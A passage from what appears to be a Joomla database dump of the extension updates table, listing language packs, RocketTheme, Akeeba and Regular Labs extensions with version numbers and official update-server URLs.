Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(12686,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(12687,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(12688,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(12689,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(12690,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(12691,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(12692,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(12693,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(12694,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(12695,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(12696,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(12697,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(12698,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(12699,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(12700,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(12701,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(12702,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(12703,57,0,'French','','pkg_fr-FR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(12704,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(12705,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(12706,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(12707,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(12708,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(12709,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(12710,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(12711,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(12712,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(12713,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(12714,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(12715,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(12716,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(12717,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(12718,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(12719,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(12720,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(12721,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(12722,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(12723,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(12724,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(12725,57,0,'English US','','pkg_en-US','package','',0,'3.9.15.2','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(12726,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(12727,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(12728,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(12729,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(12730,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(12731,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(12732,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(12733,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(12734,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(12735,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(12736,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(12737,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(12738,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(12739,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(12740,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(12741,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(12742,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(12743,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(12744,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(12745,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(12746,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(12747,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(12748,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(12749,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.0.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-0-2.html\n				',''),(12750,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.10','','http://cdn.akeebabackup.com/updates/fef.xml','\n					https://www.akeebabackup.com/download/fef/1-0-10.html\n				',''),(12751,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.1FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(12752,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.1','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n					https://www.akeebabackup.com/download/fof3/3-5-1.html\n				',''),(12753,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12754,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12755,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(12756,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(12757,3,0,'French','','pkg_fr-FR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(12758,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(12759,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(12760,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(12761,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(12762,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(12763,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(12764,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(12765,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(12766,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(12767,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(12768,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(12769,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(12770,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(12771,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(12772,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(12773,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(12774,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(12775,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(12776,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(12777,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(12778,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(12779,3,0,'English US','','pkg_en-US','package','',0,'3.9.15.2','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(12780,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(12781,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(12782,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(12783,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(12784,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(12785,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(12786,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(12787,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(12788,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(12789,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(12790,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(12791,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(12792,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(12793,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(12794,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(12795,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(12796,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(12797,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(12798,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(12799,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(12800,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(12801,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(12802,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(12803,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12804,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(12805,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(12806,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(12807,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(12808,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(12809,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(12810,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(12811,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(12812,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(12813,57,0,'French','','pkg_fr-FR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(12814,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(12815,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(12816,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(12817,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(12818,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(12819,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(12820,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(12821,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(12822,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(12823,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(12824,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(12825,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(12826,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(12827,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(12828,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(12829,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(12830,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(12831,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(12832,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(12833,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(12834,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(12835,57,0,'English US','','pkg_en-US','package','',0,'3.9.15.2','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(12836,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(12837,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(12838,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(12839,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(12840,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(12841,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(12842,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(12843,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(12844,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(12845,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(12846,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(12847,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(12848,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(12849,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(12850,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(12851,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(12852,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(12853,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(12854,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(12855,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(12856,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(12857,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(12858,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(12859,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.0.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-0-2.html\n				',''),(12860,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.10','','http://cdn.akeebabackup.com/updates/fef.xml','\n					https://www.akeebabackup.com/download/fef/1-0-10.html\n				',''),(12861,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.1FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(12862,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.1','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n					https://www.akeebabackup.com/download/fof3/3-5-1.html\n				',''),(12863,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12864,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12865,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12866,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12867,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.0.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-0-2.html\n				',''),(12868,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12869,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12870,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12871,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12872,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.0.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-0-2.html\n				',''),(12873,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12874,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(12875,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(12876,3,0,'French','','pkg_fr-FR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(12877,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(12878,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(12879,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(12880,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(12881,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(12882,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(12883,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(12884,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(12885,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(12886,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(12887,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(12888,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(12889,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(12890,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(12891,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(12892,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(12893,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(12894,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(12895,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(12896,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(12897,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(12898,3,0,'English 